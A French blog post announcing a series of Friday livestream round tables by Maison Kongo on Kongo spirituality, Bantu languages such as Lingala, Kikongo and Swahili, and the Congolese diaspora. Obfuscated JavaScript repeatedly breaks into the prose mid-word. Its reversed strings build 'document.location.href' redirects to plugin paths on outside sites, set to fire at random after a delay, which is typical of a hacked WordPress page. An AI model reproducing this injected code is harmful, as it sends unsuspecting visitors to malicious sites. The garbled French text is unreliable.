Je suis ravie de vous retrouver, comme toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours. Cette fois, je vous ramène un programme pour les vendredi soir. Si vous êtes passionnés d’Afrique et précisément du Congo, vous allez appréciez ces rendez-vous. Et si la culture Kongo vous parle, abonnez-vous car ce sera inspirant, pédagogique et participatif.
Table Ronde X Maison Kongo vous donne rendez-vous les vendredis !

Le Haut Conseil des Communautés de la diaspora Congolaise (HCCC) par la voie de son Président; Mutiri Ndagi, voudrait apporter quelques pistes de reflexions sur les éléments constitutifs d’une diaspora, ce qui fait sa force et comment elle peut durablement impacter son pays d’origine à partir de ses pays d’accueil.
Le programme des lives ainsi que les thèmes…
- Vendredi 13/11/2020 – Comment peut-on adorer le bois et la pierre ?
C’est l’occasion d’aborder les enjeux autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour des artefacts qui, à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort ou à raison, ont été considérés comme représentatifs de divinités. Pourquoi ne trouve-t-on de fétiches qu’en Afrique noire ? Qui plus est, pourquoi ces objets bannis se retrouvent en nombre dans les musées et collections occidentaux ?
- Vendredi 27/11/2020 – La représentation du sacré dans les arts des peuples Kongo
Quels sont ces anciens noms et que nous renseignent-ils sur la spiritualité des peuples Kongo ?
Chaque peuple a nommé Dieu et d’une certaine façon l’a représenté. Dans son sens le plus large, la culture peut aujourd’hui être considérée comme l’ensemble des traits distinctifs, spirituels, matériels, intellectuels et affectifs, qui caractérisent une société ou un groupe social. Elle englobe, outre les arts, les lettres et les sciences, les modes de vie, les lois, les systèmes de valeurs, les traditions et les croyances.
Partant de cette définition, la Maison Kongo veut mettre en avant les traits caractéristiques des peuples Kongo en générale et plus particulièrement, des peuples dont les destin commun a désigné comme étant les congolais.
3 traits sur lesquels nous insisterons : la spiritualité, les langues et les sciences. Notre trajet spirituel a débuté il y a deux semaines par la question « Comment peuvent-ils adorer le bois ou la pierre ». Nous avons ici découvert une notion importante, celle de l’égrérore : l’ensemble des énergies cumulées de plusieurs personnes vers un but ou une croyance défini par eux. Bien avant cela, nous avons évoqué les dieux grâces et romains mêlés aux autres symboles des rites et croyances venues d’Afrique et d’ailleurs. Aujourd’hui, nous nous attarderons sur les noms des dieux Bantu.
- Vendredi 18/12/2020 – Les rites funéraires de l’ancienne époque à nos jours
Quelles sont les raisons d’être du rite funéraire ?
Y a-t-il une particularité bantu et quelles traces elle a laissé dans le monde moderne ?
- Vendredi 8/01/2021 – Langues bantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toues et identités nationales
Comment l’adoption d’une langue force la destinée des peuples et comment s’en libérer ?
- Vendredi 22/01/2021 – Le rayonnement géographique du Lingala
On compte environ 20 millions de locuteurs lingalaphones en langue maternelle et 20 à 25 de millions de locuteurs utilisant le lingala comme deuxième ou troisième langue. Le lingala est sans doute la langue congolaise la moins bien connue et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout défendue par ses locuteurs. Ce live sera l’occasion de découvrir l’amour haine qui le précède partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout où il est parlé.
- Vendredi 05/02/2021 – Kikongo, une langue initiatique ?
Au comble de l’admiration pour la richesse et l’énergie du kikongo et son haut degré de perfection, les missionnaires français de Loango n’hésitèrent pas à lui soupçonner une affiliation au latin, langue savante par excellence.
- Vendredi 19/02/2021 – La naissance et la mort du Swahili
Comment peut-on parler de la mort d’une langue que l’on voudrait unifier pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le continent africain ? Comment peut on parler de la mort de la langue africaine la plus enseignée dans le monde ? Rappel : Le swahili, langue de travail de l’Union Africaine, est également langue officielle de la Communauté des pays d’Afrique de l’Est qui regroupe le Kenya, la Tanzanie, l’Ouganda, le Rwanda, le Burundi et le Soudan du sud. Quel est le message qui se cache derrière ce live ?
Invité spécial : le dessinateur Barly Baruti !
- Vendredi 22/04/2021 – Tshiluba, la langue savante
- Vendredi 23/04/2021 – Le lusona, écriture divine ou signe cabalistique ?
- Vendredi 30/04/2021 – Et s’ils n’avaient jamais découvert le feu ?
- Vendredi 07/05/2021 – Ishango, la source des mathématiques
- Vendredi 14/05/2021 – La philosophie bantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toue, « Je fais donc je suis »
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor »/>
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute-premi-re-table-ronde-pour-maison-kongo-s-est-articul-e-sur-4-axes »>La toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute première Table Ronde pour Maison Kongo s’est articulée sur 4 axes :
- la construction d’une identité
- l’histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire de la diaspora congolaise
- les ambitions de la diaspora
- le projet « Maison Kongo »
Comment suivre la Table Ronde spéciale Maison Kongo ?
Abonnez-vous déjà à ma page Facebook et ma chaine Youtube ainsi qu’à la page facebook de Maison Kongo et à l’heure du live, vous nous verrez apparaître dans un live.
À très vite !